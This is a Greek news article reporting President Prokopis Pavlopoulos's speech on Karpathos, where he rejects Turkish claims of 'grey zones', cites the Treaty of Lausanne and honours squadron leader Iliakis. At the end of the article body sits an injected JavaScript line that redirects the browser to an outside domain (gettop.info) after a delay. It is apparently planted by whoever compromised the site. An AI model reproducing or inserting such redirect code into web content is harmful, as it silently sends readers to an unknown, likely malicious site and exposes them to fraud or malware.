Παυλόπουλος: Στη φαντασία της Τουρκίας οι γκρίζες ζώνες

0
4

 

Κάθε αμφισβήτηση της συνθήκης της Λωζάννης, είναι αμφισβήτηση ευρωπαϊκού εδάφους, διαμήνυσε από την Κάρπαθο, κατά την τελετή ανακήρυξης του ως επίτιμου δημότη του νησιού, ο Πρόεδρος της Δημοκρατίας Προκόπης Παυλόπουλος, ενώ τόνισε ότι η Τουρκία πρέπει να γνωρίζει πως γκρίζες ζώνες δεν υπάρχουν παρά μόνο στην φαντασία της.

Ο κ. Παυλόπουλος επέμεινε ότι, εφ’ όσον παραβιάζεται το διεθνές δίκαιο, παραβιάζεται και η ειρήνη, ενώ υπενθύμισε ότι αυτό το θέμα αφορά και την Ευρώπη, γιατί τα σύνορα της Ελλάδας είναι και σύνορα της Ευρώπης.

Αναφερόμενος στην Τουρκία, ο κ. Παυλόπουλος σημείωσε ότι στις δύσκολες ώρες που αντιμετώπισε πρόσφατα, με την απόπειρα πραξικοπήματος, η Ελλάδα έτεινε χέρι φιλίας.

Ο κ. Παυλόπουλος κατέθεσε στεφάνι στη μνήμη του σμηναγού Κωνσταντίνου Ηλιάκη, τονίζοντας ότι «η θυσία του διδάσκει τη διαχρονική απάντηση που εμείς, οι Έλληνες, δίνουμε και θα δίνουμε πάντα σε οιονδήποτε επιβουλεύεται την ακεραιότητα και την κυριαρχία της Ελλάδας μας: “Μολών λαβέ”». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here